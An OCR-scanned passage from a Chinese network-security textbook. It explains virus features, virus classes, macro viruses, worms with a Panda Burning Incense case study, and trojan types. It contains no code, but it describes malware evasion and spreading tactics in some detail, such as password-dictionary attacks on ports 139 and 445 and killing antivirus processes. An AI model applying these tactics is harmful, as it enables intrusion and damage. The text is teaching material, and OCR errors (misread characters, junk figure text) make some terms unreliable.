但 对 一 些 杀 毒 软件 不 能 及 时 发 现 的 新 病毒 ,通过 观察 病毒 现象 还 是 很 有 用 处 的 。 


4.3.2 计算 机 病毒 的 特征 


计算 机 病毒 的 特征 主要 有 传染 性 、 隐 项 性 ` 潜 伏 性 .触发 性 破坏 性 和 不 可 预见 性 。 

@ 传染 性 。 计 算 机 病毒 会 通过 各 种 媒介 从 已 被 感染 的 计算 机 扩散 到 未 被 感染 的 计算 
机 。 这 些 媒介 可 以 是 程序 .文件 .存储 介质 、 网 络 等 。 

@ 隐蔽 性 。 不 经 过 程序 代码 分 析 或 计算 机 病毒 代码 扫描 ,计算 机 病毒 程序 与 正常 程序 
是 不 容易 区 分 的 。 在 没有 防护 措施 的 情况 下 ,计算 机 病毒 程序 一 经 运行 并 取得 系统 控制 权 
后 ,可 以 迅速 感染 给 其 他 程序 ,而 在 此 过 程 中 屏幕 上 可 能 没有 任何 异常 显示 。 这 种 现象 就 是 
计算 机 病毒 传染 的 隐蔽 性 。 

@ 潜伏 性 。 病 毒 具有 依附 于 其 他 媒介 寄生 的 能 力 , 它 可 以 在 磁盘 .光盘 或 其 他 媒介 上 
潜伏 几 天 ,甚至 几 年 。 不 满足 其 触发 条 件 时 ,除了 感染 其 他 文件 以 外 不 做 破坏 ;触发 条 件 一 
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且 得 到 满足 ,病毒 就 四 处 繁殖 .扩散 、 破 坏 。 

@ 触发 性 。 计 算 机 病毒 发 作 往往 需要 一 个 触发 条 件 , 其 可 能 利用 计算 机 系统 时 钟 , 病 
毒 体 自 带 计数 器 .计算 机 内 执行 的 某 些 特定 操作 等 。 如 CIH 病毒 在 每 年 4 月 26 日 发 作 ,而 
一 些 邮件 病毒 在 打开 附件 时 发 作 。 

@@ 破坏 性 。 当 触发 条 件 满足 时 ,病毒 在 被 感染 的 计算 机 上 开始 发 作 。 根 据 计 算 机 病毒 
的 危害 性 不 同 ,病毒 发 作 时 表现 出 来 的 症状 和 破坏 性 可 能 有 很 大 差别 。 从 显示 一 些 令 人 讨 
厌 的 信息 ,到 降低 系统 性 能 、 破 坏 数据 (信息 ) ,直到 永久 性 摧毁 计算 机 硬件 和 软件 ,造成 系统 
骨 溃 、 网 络 瘫痪 等 。 

G@ 不 可 预见 性 。 病 毒 相 对 于 杀毒 软件 永远 是 超前 的 ,从 理论 上 讲 , 没 有 任何 杀毒 软件 
可 以 杀 除 所 有 的 病毒 。 

为 了 达到 保护 自己 的 日 的 ,计算 机 病毒 作者 在 编写 病毒 程序 时 ,一般 都 采用 一 些 特殊 的 
编程 技术 。 

@ 自 加 密 技 术 。 就 是 为 了 防止 被 计算 机 病毒 检测 程序 扫描 出 来 ,并 被 轻易 地 反 汇 编 。 
计算 机 病毒 使 用 了 加 密 技术 后 ,对 分 析 和 破译 计算 机 病毒 的 代码 及 清除 计算 机 病毒 等 工作 
都 增加 了 很 多 困难 。 

@ 采用 变形 技术 。 当 某 些 计 算 机 病毒 编制 者 通过 修改 某 种 已 知 计 算 机 病毒 的 代码 ,使 
其 能 够 躲 过 现 有 计算 机 病毒 检测 程序 时 , 称 这 种 新 出 现 的 计算 机 病毒 是 原来 被 修改 前 计算 
机 病毒 的 变形 。 当 这 种 变形 了 的 计算 机 病毒 继承 了 原 父 本 计算 机 病毒 的 主要 特征 时 ,就 称 
为 是 其 父 本 计算 机 病毒 的 一 个 变种 。 

@ 对 抗 计算 机 病毒 防范 系统 。 计 算 机 病毒 采用 对 抗 计算 机 病毒 防范 系统 技术 时 ， 
当 发 现 磁 盘 上 有 某 些 著名 的 计算 机 病毒 杀毒 软件 或 在 文件 中 查找 到 发 行 这 些 软件 的 
公司 的 名 称 时 ,就 会 删除 这 些 杀 毒 软件 或 文件 ,造成 杀毒 软件 失效 ,甚至 引起 计算 机 系 

@ 反 跟 踪 技 术 。 计 算 机 病毒 采用 反 跟 踪 措 施 的 目的 是 要 提高 计算 机 病毒 程序 的 防 破 
译 能 力 和 伪装 能 力 。 常 规程 序 使 用 的 反 跟 踪 技 术 在 计算 机 病毒 程序 中 都 可 以 利用 。 


4.3.3 计算 机 病毒 的 分 类 


尽管 计算 机 病毒 的 数量 非常 多 ,表现 形式 也 多 种 多 样 而且, 病毒 的 数量 仍 在 不 断 增加 ， 
但 根据 一 定 的 标准 ,可 以 把 它们 分 成 几 种 类 型 。 因 此 .同一 种 病毒 可 能 是 不 同类 型 的 病毒 。 


1. 按 病毒 存在 的 媒体 分 


按 病毒 存在 的 媒体 分 ,病毒 可 以 划分 为 网 络 病毒 ,文件 型 病毒 .引导 型 病毒 。 网 络 病毒 
通过 计算 机 网 络 传播 感染 网 络 中 的 可 执行 文件 ;文件 型 病毒 感染 计算 机 中 的 文件 
(如 .com、. exe 和 . bat 文件 等 ); 引 导 型 病毒 感染 启动 扇 区 (Boot) 和 硬盘 的 系统 主 引导 记 
录 (MBR )。 

还 有 这 三 种 情况 的 混合 型 .例如 ,多 型 病毒 (文件 型 和 引导 型 ) 感 染 文件 和 引导 扇 区 两 种 
目标 :这样 的 病毒 通常 都 具有 复杂 的 算法 .它们 使 用 非常 规 的 办 法 侵入 系统 .同时 使 用 了 加 
密 和 变形 算法 。 目 前 很 多 病毒 都 是 这 种 混合 类 型 的 ,一 旦 中 毒 就 很 难 删除 。 病 毒 在 感染 系 
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统 之 后 ,会 在 多 处 建立 自我 保护 功能 ,比如 注册 表 、 进 程 .系统 启动 项 等 位 置 。 如 果 进 行 手动 
清除 ,在 注册 表 中 找到 病毒 对 应 项 ,删除 后 进程 一 旦 检测 出 来 ,会 重新 写 人 注册 表 。 而 在 进 
程 中 ,病毒 也 不 是 单一 地 建立 一 个 进程 ,而 一 般 是 两 个 或 多 个 进程 ,同时 这 些 病毒 进程 之 间 
互 为 守护 进程 , 即 关 掉 一 个 ,另外 的 进程 会 马上 检测 到 ,并 新 建 一 个 刚 被 删除 的 进程 。 


2. 按 病毒 传染 的 方法 分 


按 病毒 传染 的 方法 可 分 为 驻 留 型 病毒 和 非 驻 留 型 病毒 。 驻 留 型 病毒 感染 计算 机 后 ,把 
自身 的 内 存 驻 留 部 分 放 在 内 存 (RAM) 中 ,这 一 部 分 程序 挂 接 系统 调用 并 合并 到 操作 系统 中 
去 , 它 处 于 激活 状态 ,一 直到 关机 或 重新 启动 。 非 驻 留 型 病毒 在 得 到 机 会 激活 时 并 不 感染 计 
算 机 内 存 ,一些 病 毒 在 内 存 中 留 有 小 部 分 ,但 是 并 不 通过 这 一 部 分 进行 传染 ,这 类 病毒 也 被 
划分 为 非 驻 留 型 病毒 。 


3. 按 病毒 破坏 的 能 力 分 


按 病毒 破坏 的 能 力 大 小 ,可 分 为 无 害 型 病毒 .无 危险 型 病毒 .危险 型 病毒 和 非常 危险 型 
病毒 。 

@ 无 害 型 病毒 。 除 了 传染 时 减少 磁盘 的 可 用 空间 外 ,对 系统 没有 其 他 影响 。 

@ 无 危险 型 病毒 。 这 类 病毒 仅仅 是 减少 内 存 .显示 图 像 .发 出 声音 及 同类 音响 。 

@ 危险 型 病毒 。 这 类 病毒 在 计算 机 系统 操作 中 造成 严重 的 错误 。 

@ 非常 危险 型 病毒 。 这 类 病毒 删除 程序 .破坏 数据 、 清 除 系统 内 存 区 和 操作 系统 中 重 
要 的 信息 。 


4. 按 病毒 链接 的 方式 分 


由 于 病毒 本 身 必须 有 一 个 攻击 对 象 以 实现 对 计算 机 系统 的 攻击 ,病毒 所 攻击 的 对 象 是 
计算 机 系统 可 执行 的 部 分 。 因 此 , 按 病毒 链接 的 方式 可 以 将 病毒 分 为 以 下 几 类 。 

中 源码 型 病毒 。 该 种 病毒 攻击 高 级 语言 编写 的 程序 ,该 病毒 在 高 级 语言 所 编写 的 程序 
编译 前 插入 源 程 序 中 ,经 编译 成 为 合法 程序 的 一 部 分 。 

@ 在 入 型 病毒 。 这 种 病毒 是 将 自身 嵌入 现 有 程序 中 ,把 病毒 的 主体 程序 与 其 攻击 的 对 
象 以 插入 的 方式 链接 。 这 种 病毒 是 难以 编写 的 ,一 旦 侵入 程序 体 后 也 较 难 消除 。 

@ 外 过 型 病毒 。 该 种 病毒 将 其 自身 包围 在 主 程序 的 四 周 ,对 原来 的 程序 不 做 修改 。 这 
种 病毒 最 为 常见 ,易于 编写 ,也 易于 发 现 , 一 般 测 试 文件 的 大 小 即 可 知道 。 

@ 操作 系统 型 病毒 。 这 种 病毒 用 它 自己 的 程序 意图 加 入 或 取代 部 分 操作 系统 的 程序 
模块 进行 工作 ,具有 很 强 的 破坏 性 ,可 以 导致 整个 系统 的 瘫痪 。 


5. 按 病毒 激活 的 时 间 分 


按 病毒 激活 的 时 间 可 分 为 定时 型 病毒 和 随机 型 病毒 。 
中 定时 型 病毒 。 定 时 型 病毒 是 在 某 一 特定 时 间 才 发 作 的 病毒 , 它 以 时 间 为 发 作 的 触发 
条 件 , 如 果 时 间 不 满足 ,此 类 病毒 将 不 会 进行 破坏 活动 。 
@ 随机 型 病毒 。 与 定时 型 病毒 不 同 的 是 随机 型 病毒 .此 类 病毒 不 是 通过 时 间 进 行 触 
发 的 。 
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4.3.4 宏 病 毒 和 蠕虫 病毒 


1. 宏 病 毒 


宕 (Macro) 是 Microsoft 公司 为 其 Office 软件 包 设 计 的 一 项 特殊 功能 , Microsoft 公司 
设计 它 的 目的 是 让 人 们 在 使 用 Office 软件 进行 工作 时 避免 一 再 地 重复 相同 的 动作 。 利 用 
简单 的 语法 ,把 常用 的 动作 写成 宏 ,在 工作 时 ,可 以 直接 利用 事先 编写 好 的 宏 自 动 运行 ,完成 
某 项 特定 的 任务 ,而 不 必 再 重复 相同 的 动作 ,让 用 户 文档 中 的 一 些 任务 自动 化 。 

使 用 Word 软件 时 ,通用 模板 (Normal. dot) 里 面 就 包含 了 基本 的 宏 ,因此 当 使 用 该 模板 
时 ,Word 为 用 户 设 定 了 很 多 基本 的 格式 。 宏 病毒 是 用 Visual Basic 语言 编写 的 ,这 些 宏 病 
毒 不 是 为 了 方便 人 们 的 工作 而 设计 的 ,而 是 用 来 对 系统 进行 破坏 的 。 当 含有 这 些 宏 病毒 的 
文档 被 打开 时 ,里 面 的 宏 病 毒 就 会 被 激活 ,并 能 通过 DOC 文档 及 DOT 模板 进行 自我 复制 
及 传播 。 

以 往 病 毒 只 感染 程序 ,不 感染 数据 文件 ,而 宏 病 毒 专门 感染 数据 文件 ,彻底 改变 了 “数据 
文件 不 会 传播 病毒 ”的 错误 认识 。 安 病毒 会 感染 Office 的 文档 及 其 模板 文件 。 

对 宏 病 毒 进行 防范 可 以 采取 以 下 几 项 措施 。 

QO@ 提高 宏 的 安全 级 别 。 日 前 ,高 版 本 的 Word 软件 可 以 设置 宏 的 安全 级 别 , 在 不 影响 
正常 使 用 的 情况 下 ,应 该 选择 较 高 的 安全 级 别 。 

@ 删除 不 知 来 路 的 宏 定 义 。 

@ 将 Normal. dot 模板 进行 备份 , 当 被 病毒 感染 后 ,使 用 备份 模板 进行 覆盖 。 

如 果 怀 疑 外 来 文件 含有 安 病 毒 , 可 以 使 用 写字 板 软件 打开 该 文件 ,然后 将 文本 粘贴 到 
Word 文档 中 ,转换 后 的 文档 是 不 会 含有 宏 病 毒 的 。 


2. 蠕虫 病毒 


(1) 蠕虫 病毒 的 概念 

蠕虫 (Worm) 病毒 是 一 种 通过 网 络 传播 的 恶性 病毒 . 它 具 有 病毒 的 一 些 共性 ,如 传播 
性 、 隐 项 性 破坏 性 等 ,同时 具有 自己 的 一 些 特征 ,如 不 利用 文件 寄生 (有 的 只 存在 于 内 存 
中 ) ,对 网 络 造成 拒绝 服务 ,易于 和 黑客 技术 相 结合 。 在 产生 的 破坏 性 上 ,蠕虫 病毒 也 不 
是 普通 病毒 所 能 比拟 的 ,网 络 的 发 展 使 得 蠕虫 可 以 在 短 时 间 内 草 延 整个 网 络 ,造成 网 络 
瘫痪 。 

根据 使 用 者 情况 可 将 蠕虫 病毒 分 为 两 类 。 一 类 是 面向 企业 用 户 和 局 域 网 的 ,这 类 病毒 
利用 系统 漏洞 ,主动 进行 攻击 ,对 整个 Internet 可 造成 瘫痪 性 的 后 果 , 如 “ 尼 姆 达 ”、“SQL 里 
虫 王 ”“ 冲 击 波 ” 等 。 另 一 类 是 针对 个 人 用 户 的 ,通过 网 络 ( 主 要 是 电子 邮件 、 恶 意 网 页 形式 ) 
迅速 传播 ,以 爱 虫 病毒 ,求职 信 病 毒 为 代表 。 在 这 两 类 蠕虫 病毒 中 ,第 一 类 具有 很 大 的 主动 
攻击 性 ,而 且 爆 发 也 有 一 定 的 突然 性 。 第 二 类 病毒 的 传播 方式 比较 复杂 、 多 样 ,少数 利用 了 
Microsoft 应 用 程序 的 漏洞 ,更 多 的 是 利用 社会 工程 学 对 用 户 进 行 欺骗 和 诱 使 ,这 样 的 病毒 
造成 的 损失 是 非常 大 的 ,同时 也 是 很 难 根除 的 ,比如 求职 信 病 毒 ,在 2001 年 就 已 经 被 各 大 杀 
毒 厂 商 发 现 ,但 直到 2002 年 年 底 依然 排 在 病毒 危害 排行 榜 的 首位 。 
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(2) 蠕虫 病毒 与 一 般 病毒 的 区 别 

蠕虫 病毒 一 般 不 采取 利用 PE(Portable Executable) 格 式 插入 文件 的 方法 ,而 是 复制 自 
身 在 Internet 环境 下 进行 传播 。 病 毒 的 传染 能 力主 要 是 针对 计算 机 内 的 文件 系统 而 言 ,而 
蠕虫 病毒 的 传染 目标 是 Internet 上 的 所 有 计算 机 。 局 域 网 条 件 下 的 共享 文件 夹 . 电 子 邮件 、 
网 络 中 的 恶意 网 页 .大量 存在 着 漏洞 的 服务 器 等 都 成 为 蠕虫 传播 的 良好 途径 。 网 络 的 发 展 
也 使 得 蠕虫 病毒 可 以 在 几 个 小 时 内 草 延 全 球 ,而 且 蠕 虫 病毒 的 主动 攻击 性 和 突然 爆发 性 将 
使 得 人 们 手足 无 措 。 蠕虫 病 毒 与 一 般 病毒 的 比较 如 表 4-1 所 示 。 


表 4-1 蠕虫 病毒 与 一 般 病毒 的 比较 


项 目 蠕虫 病毒 一 般 病毒 
存在 形式 独立 存在 寄存 文件 
传染 机 制 主动 攻击 宿主 文件 运行 
传染 目标 网 络 文件 


(3)“ 熊 猫 烧香 ”病毒 实例 

2006 年 年 底 ,“ 熊 猫 烧香 ”病毒 在 我 国 Internet 上 大 规模 爆发 ,由 于 该 病毒 传播 手段 极 
为 全 面 ,并 且 变 种 频繁 更 新 ,让 用 户 和 杀毒 厂商 防不胜防 ,被 列 为 2006 年 10 大 病毒 之 首 。 
“熊猫 烧香 "病毒 是 一 种 蠕虫 病毒 ( 尼 姆 达 ) 的 变种 ,而 且 是 经 过 多 次 变种 而 来 的 。 由 于 中 毒 
计算 机 的 可 执行 文件 会 出 现 “ 熊 猫 烧 香 ” 图 案 . 所 以 被 称 为 熊猫 烧香 ”病毒 。“ 能 猫 烧 香 ” 病 
毒 是 用 Delphi 语言 编写 的 ,这 是 一 个 有 黑客 性 质感 染 型 的 蠕虫 病毒 ( 即 蠕虫 十 木马 )。2007 年 
2 月 “熊猫 烧香 "病毒 设计 者 李 俊 归 案 , 交 出 杀 病 毒 软件 。2007 年 9 月 ,湖北 省 仙桃 市 法 院 
一 审 以 破坏 计算 机 信息 系统 罪 判 处 李 俊 有 期 徒刑 4 年 。 

感染 “熊猫 烧香 "病毒 的 症状 。 关 闭 众 多 杀毒 软件 和 安全 工具 。 

感染 所 有 .exe、 scr、 pif、. com 文件 ,并 更 改 图 标 为 烧香 熊猫 ,如 图 4-4 所 示 。 


内 和 富 言 言 相 村 


tdc.ocx wshom.ocx actmovie.exe append.exe at.exe atmadm.exe 


名 加 加 区 富 多 
> 】 
attrib,exe autochk.exe autoconv.exe autofmt,exe autolfn.exe bootok.exe bootvrfy,exe 


图 4-4 感染 “熊猫 烧香 "病毒 的 症状 


循环 遍历 磁盘 ,感染 文件 ,对 关键 系统 文件 跳 过 ,不 感染 Windows 媒体 播放 器 、MSN 、 
IE 等 程序 。 在 硬盘 各 个 分 区 中 生成 文件 autorun. inf 和 setup. exe。 

感染 所 有 . htm、. html、. asp、. Php、. jsp、. aspx 文件 ,添加 木马 恶意 代码 ,导致 用 户 一 打 
开 这 些 网 页 文件 .IE 就 会 自动 链接 到 指定 的 病毒 网 址 中 下 载 病 毒 。 

自动 删除 * . gho 文件 .使 用 户 的 系统 备份 文件 丢失 。 

计算 机 会 出 现 蓝 屏 、 频 繁重 新 启动 等 情形 。 
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加 “熊猫 烧香 "病毒 的 传播 途径 。 

a. 通过 U 盘 和 移动 硬盘 进行 传播 。 

b. 通过 局 域 网 共享 文件 夹 、 系 统 弱 口令 等 传播 。 当 病毒 发 现 能 成 功 链接 攻击 日 标的 
139 端口 或 445 端口 后 ,将 使 用 内 置 的 一 个 用 户 列 表 及 密码 字典 进行 链接 。( 猜 测 被 攻击 端 
的 密码 ) 当 成 功 的 链接 上 以 后 ,将 自己 复制 过 去 并 利用 计划 任务 启动 激活 病毒 。 

c. 通过 网 页 传播 。 

@“ 熊 猫 烧 香 " 病 毒 所 造成 的 破坏 。 关 闭 众 多 杀毒 软件 。 每 隔 1s 寻找 桌面 窗口 ,并 关 
闭 窗口 标题 中 含有 以 下 字符 的 程序 :QQKav、QQAV 防火墙. 进程 、VirusScan、 网 镖 、 杀 毒 、 
毒霸 、 瑞 星 、 江 民 、 超 级 兔子 、 优 化 大 师 、 木 马克 星 、 注 册 表 编辑 器 ,卡巴 斯 基 反 病毒 、 
Symantec AntiVirus、 Duba…… 

修改 注册 表 。 使 得 病毒 能 自 启动 .删除 安全 软件 在 注册 表 中 的 键 值 \ 不 显示 隐藏 文件 、 
删除 相关 安全 服务 等 。 

下 载 病毒 文件 。 每 隔 10s ,下 载 病毒 制作 者 指定 的 文件 ,并 用 命令 行 检查 系统 中 是 否 存 
在 共享 ,如果 共享 存在 就 运行 net share 命令 关闭 admin$ 共享 。 


4.3.5 木马 


木马 是 一 种 日 的 非常 明确 的 病毒 程序 ,通常 会 通过 伪装 吸引 用 户 下 载 并 执行 。 一 旦 用 
户 触发 了 木马 程序 (俗称 种 马 ) ,被 种 马 的 计算 机 就 会 为 施 种 木马 者 提供 一 条 通道 ,使 施 种 者 
可 以 任意 毁坏 、 窃 取 被 种 者 的 文件 .密码 等 ,甚至 远程 操控 被 种 者 的 计算 机 。 

木马 全 称 “ 特 洛 伊 木马 ”, 英 文 名 称 为 Trojan Horse, 据 说 这 个 名 称 来 源 于 希腊 神话 《 木 
马 屠 城 记 》。 古 希腊 大 军 围攻 特洛伊 城 , 久 久 无 法 攻 下 。 于 是 有 人 献计 制造 一 只 高 两 丈 的 大 
木马 ,假装 作战 马 神 , 让 士兵 藏匿 于 巨大 的 木马 中 .大 部 队 假装 撤退 而 将 木马 握 弃 于 特洛伊 
城下 。 城 中 得 知 解围 的 消息 后 , 遂 将 “木马 ”作为 奇异 的 战利品 拖 人 城内 ,全 城 饮 酒 狂欢 。 到 
午夜 时 分 ,全 城 军 民 进 入 梦乡 ,藏匿 于 木马 中 的 将 士 打 开 秘 门 由 绳 而 下 ,开启 城 门 及 四 处 纵 
火 , 城 外 伏兵 涌 和 ,部队 里 应 外 合 , 焚 层 特洛伊 城 。 后 世 称 这 只 大 木马 为 “特洛伊 木马 ”, 如 今 
黑客 程序 借用 其 名 ,有 "一 旦 潜入 ,后 患 无 穷 " 之 意 。 

木马 程序 通常 会 设法 隐藏 自己 ,以 骗取 用 户 的 信任 。 木 马 程序 对 用 户 的 威胁 越 来 越 大 ， 
尤其 是 一 些 木马 程序 采用 了 极其 特殊 的 手段 来 隐藏 自己 ,使 普通 用 户 很 难 在 中 毒 后 发 觉 。 


1. 服务 端 和 客户 端 


木马 通常 有 两 个 可 执行 程序 :一 个 是 客户 端 , 即 控制 端 ; 另 一 个 是 服务 端 , 即 被 控制 端 。 
黑客 们 将 服务 端 成 功 植 人 用 户 的 计算 机 后 ,就 有 可 能 通过 客户 端 * 进 入 "用 户 的 计算 机 。 被 
植 人 木马 服务 端的 计算 机 常 称 被 “种 马 ”, 也 俗称 为 “中 马 ”。 用 户 一 旦 运行 了 被 种 植 在 计算 
机 中 的 木马 服务 端 , 就 会 有 一 个 或 几 个 端口 被 打开 .使 黑客 有 可 能 利用 这 些 打开 的 端口 进入 
计算 机 系统 ,安全 和 个 人 隐私 也 就 全 无 保障 了 。 木 马 服务 端 一 旦 运行 并 被 控制 端 连接 ,其 控 
制 端 将 享有 服务 端的 大 部 分 操作 权限 ,例如 给 计算 机 增加 口令 ,浏览 .移动 .复制 .删除 文件 ， 
修改 注册 表 ,更改 计算 机 配置 等 。 由 于 运行 了 木马 服务 端的 计算 机 完全 被 客户 端 控制 , 任 由 
黑客 宰割 ,所 以 ,运行 了 木马 服务 端的 计算 机 也 常 被 人 戏称 为 “ 肉 机 ”。 
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2. 木马 程序 的 基本 特征 


虽然 木马 的 种 类 繁多 ,而且 功能 各 异 , 大 都 有 自己 特定 的 目的 。 但 综合 现在 流行 的 木 
马 ,它们 都 有 以 下 基本 特征 。 

@ 隐蔽 性 。 隐 蔽 性 是 木马 的 首要 特征 。 要 让 远方 的 客户 端 能 成 功 人 侵 被 种 马 的 计算 
机 ,服务 端 必须 有 效 地 隐藏 在 系统 之 中 。 隐 藏 的 目的 一 是 诱惑 用 户 运行 服务 端 ; 二 是 防止 用 
户 发 现 被 木马 感染 。 

除了 可 以 在 任务 栏 中 隐藏 .在 任务 管理 器 中 隐藏 外 ,木马 为 了 隐藏 自己 ,通常 还 会 不 产 
生 程 序 图 标 或 产生 一 些 让 用 户 错觉 的 图 标 。 如 将 木马 程序 的 图 标 修改 为 文件 夹 图 标 或 文本 
文件 图 标 后 ,由 于 系统 默认 是 “隐藏 已 知 文件 类 型 的 扩展 名 ”, 用 户 就 有 可 能 将 其 误 认 为 是 文 
件 夹 或 文本 文件 。 

@ 自动 运行 性 。 木 马 除 会 诱惑 用 户 运 行 外 ,通常 还 会 自 启动 , 即 当 用 户 的 系统 启动 时 自 
动 运 行 木马 程序 。 因 此 ,木马 通常 会 潜伏 在 用 户 的 启动 配置 文件 中 ,如 win. ini、 system. ini、 
winstart. bat ,注册 表 以 及 启动 组 中 。 

@ 欺骗 性 。 木 马 程 序 为 了 达到 长 期 潜伏 的 目的 ,常会 使 用 与 系统 文件 相同 或 相近 的 文 
件 名 ,以 explorer. exe(Windows 资源 管理 器 ) 为 例 ,这 是 一 个 非常 重要 的 系统 文件 ,正确 的 
位 置 为 C:\Windows\explorer. exe。 不 少 木 马 和 病毒 都 在 这 个 文件 上 做 文章 ,如 将 木马 文 
件 置 于 其 他 文件 夹 中 并 命名 为 explorer. exe, 或 将 木马 文件 命名 为 explorer. exe( 将 字母 “1” 
用 数字 “1” 代 替 ) 或 explOrer. exe( 将 字母 “o” 用 数字 "0” 代 替 ) ,并 将 其 存放 在 C:\Windows 
中 ,这 样 的 山寨 资源 管理 器 很 难 被 用 户 识别 。 总 之 ,木马 作者 在 研究 木马 技术 的 同时 ,也 在 
不 断 地 创新 欺骗 技术 ,现在 的 木马 可 以 说 是 越 来 越 隐蔽 。 

@ 能 自动 打开 特定 的 端口 。 和 一 般 的 病毒 不 同 ,木马 程序 潜入 用 户 的 计算 机 主要 目的 
不 是 为 了 破坏 系统 ,而 是 为 了 获取 系统 中 的 有 用 信息 。 正 因为 如 此 ,木马 程序 通常 会 自动 打 
开 系统 特定 的 端口 :以便 能 和 客户 端 进行 通信 。 

@@ 功能 的 特殊 性 。 木 马 通 常 都 具有 特定 的 目的 ,其 功能 也 就 有 特殊 性 。 以 盗号 类 的 木 
马 为 例 , 除 了 能 对 用 户 的 文件 进行 操作 之 外 ,还 会 搜索 cache 中 的 口令 .记录 用 户 键盘 的 操 
作 等 。 


3. 木马 程序 功能 


木马 程序 由 服务 端 和 客户 端 两 部 分 组 成 ,所 以 木马 程序 是 典型 的 Client/Server( 客 户 
机 /服务 器 ,C/S) 结 构 的 程序 。 木 马 程序 的 主要 功能 是 进行 远程 控制 .黑客 使 用 客户 端 程序 
远程 控制 被 植 人 服务 端的 计算 机 ,对 肉 机 进行 远程 监控 、 盗 取 系统 中 的 密码 信息 和 其 他 有 用 
资料 、 对 “ 肉 机 ”进行 远程 控制 等 。 
既然 木马 具有 远程 控制 功能 ,那么 木马 和 一 般 远程 控制 软件 有 何 区 别 呢 ? 首先 应 该 说 
明 的 是 ,早期 的 部 分 木马 ,本 是 不 错 的 远程 控制 软件 ,但 被 一 些 居心 不 良 者 用 于 非法 用 途 , 如 
冰河 、` 灰 合子 等 。 以 灰 钥 子 为 例 , 本 是 一 款 非常 优秀 的 远程 控制 软件 ,除了 支持 正 向 连接 外 ， 
还 支持 反 向 连接 , 即 客户 端 可 以 自动 请 求 服务 端 连 接 , 还 有 完善 的 摄像 头 控制 功能 。 但 很 快 
就 被 不 法 之 徒 利用 ,很 多 网 络 用 户 被 人 非法 安装 了 灰 人 角子 服务 端 程序 , 灰 钥 子 自然 也 就 成 了 
黑客 的 “帮凶 ”, 晓 变 成 了 一 款 攻 击 性 极 强 的 木马 程序 。 正 因为 如 此 , 灰 铝 子 自 然 也 就 成 了 各 
93 


网 络 安全 技术 项 目 化 教程 


反 病 毒 软件 全 力 围 梨 的 对 象 。 在 这 样 一 种 环境 下 . 灰 钥 子 工作 室 主动 发 布 了 服务 端 卸 载 程 
序 , 使 得 灰 铝 子 是 远程 控制 程序 还 是 木马 之 争 终于 告 一 段落 。 

从 上 面 的 例子 也 可 以 看 出 ,有 部 分 软件 .正确 使 用 会 是 优秀 的 远程 控制 软件 ,用 于 非法 
用 途 就 成 了 “木马 ”。 不 过 .这 种 情况 日 前 已 不 多 见 , 日 前 大 部 分 木马 是 绝对 “正宗 ”的 木马 ， 
纯粹 以 非法 获取 用 户 信息 为 日 的 。 

现在 ,区 分 一 个 程序 是 木马 还 是 远程 控制 软件 ,主要 依据 是 看 它 的 服务 端 是 否 隐藏 , 木 
马 会 想方设法 隐藏 其 服务 端 软件 ,而 远程 控制 软件 则 不 会 隐藏 。 


4. 木马 的 分 类 


常见 的 木马 主要 可 以 分 为 以 下 9 大 类 。 

(1) 破坏 型 木马 。 这 种 木马 唯一 的 功能 就 是 破坏 并 删除 文件 ,它们 能 够 删除 目标 机 上 
的 DLL、INI、EXE 文件 ,计算 机 一 旦 被 感染 其 安全 性 就 会 受到 严重 威胁 。 

(2) 密码 发 送 型 木马 。 这 种 木马 可 以 找到 日 标 机 的 隐藏 密码 ,在 受害 者 不 知道 的 情况 
下 ,把 它们 发 送 到 指定 的 邮箱 。 有 人 喜欢 把 自己 的 各 种 密码 以 文件 的 形式 存放 在 计算 机 中 ， 
认为 这 样 方便 :还 有 人 喜欢 用 Windows 提供 的 密码 记忆 功能 , 这 样 就 可 以 不 必 每 次 都 输入 
密码 了 。 这 类 木马 恰恰 是 利用 这 一 点 获取 目标 机 的 密码 ,它们 大 多 数 会 在 每 次 启动 
Windows 时 重新 运行 ,而 且 大 多 使 用 25 号 端口 发 送 E-mail。 

(3) 远程 访问 型 木马 。 这 种 木马 是 使 用 最 广泛 的 木马 , 它 可 以 远程 访问 被 攻击 者 的 硬 
盘 。 只 要 有 人 运行 了 服务 端 程序 ,客户 端 通过 扫描 等 手段 知道 了 服务 端的 IP 地 址 ,就 可 以 
实现 远程 控制 。 当 然 . 这 种 远程 控制 也 可 以 用 于 教师 监控 学 生 在 机 器 上 的 所 有 操作 。 远 程 
访问 木马 会 在 目标 机 上 打开 一 个 端口 ,而 且 有 些 木马 还 可 以 改变 端口 .设置 连接 密码 等 ,为 
的 是 只 有 黑客 自己 来 控制 这 个 木马 。 

(4) 键盘 记录 木马 。 这 种 木马 可 以 随 着 Windows 的 启动 而 启动 ,记录 受害 者 的 键盘 项 
击 并 且 在 LOG 文件 里 查找 密码 。 它 们 有 在 线 记 录 和 离线 记录 两 种 选项 ,可 以 分 别 记录 用 
户 在 线 和 离线 状态 下 项 击 键盘 时 的 按键 情况 ,也 就 是 说 ,在 日 标 计算 机 上 按 过 什么 按键 , 黑 
客 可 以 从 记录 中 知道 ,并 从 中 找 出 密码 信息 ,甚至 是 信用 卡 账号 。 这 种 类 型 的 木马 ,很 多 都 
具有 邮件 发 送 功能 .木马 找到 需要 的 密码 后 ,将 自动 把 密码 发 送 到 黑客 指定 的 邮箱 。 

(5) DoS 攻击 木马 。 随 着 DoS( 拒 绝 服务 ) 攻 击 的 增多 ,被 用 于 DoS 攻击 的 木马 也 越 来 
越 多 。 当 黑客 人 侵 一 台 机 器 后 .为 其 种 上 DoS 攻击 木马 ,那么 日 后 这 台 计 算 机 就 成 为 黑客 
Dos 攻击 的 最 得 力 助 手 。 黑 客 控制 的 *“ 肉 机 ?数量 越 多 ,发动 DoS 攻击 取得 成 功 的 几率 就 越 
大 。 所 以 ,这 种 木马 的 危害 不 是 体现 在 被 感染 计算 机 上 ,而 是 体现 在 黑客 利用 它 来 攻击 一 台 
又 一 台 计 算 机 ,给 网 络 造成 很 大 的 伤害 和 带 来 损失 。 

(6) FTP 木马 。 这 种 木马 是 最 简单 而 古老 的 木马 . 它 的 唯一 功能 就 是 打开 21 端口 等 待 
用 户 连接 。 新 FTP 木马 还 加 上 密码 功能 ,这 样 只 有 黑客 本 人 才 知 道 正确 的 密码 ,从 而 进入 
对 方 计 算 机 。 

(7) 反弹 端口 型 木马 。 防 火 墙 对 于 连 入 的 连接 往往 会 进行 非常 严格 的 过 滤 , 但 是 对 于 
连 出 的 连接 却 蕊 于 防范 。 和 一 般 的 木马 相反 ,反弹 端口 型 木马 的 服务 端 (被 控制 端 ) 往 往 使 
用 主动 端口 ,客户 端 (控制 端 ) 使 用 被 动 端口 。 木 马 定时 监测 控制 端的 存在 ,发 现 控制 端 上 线 
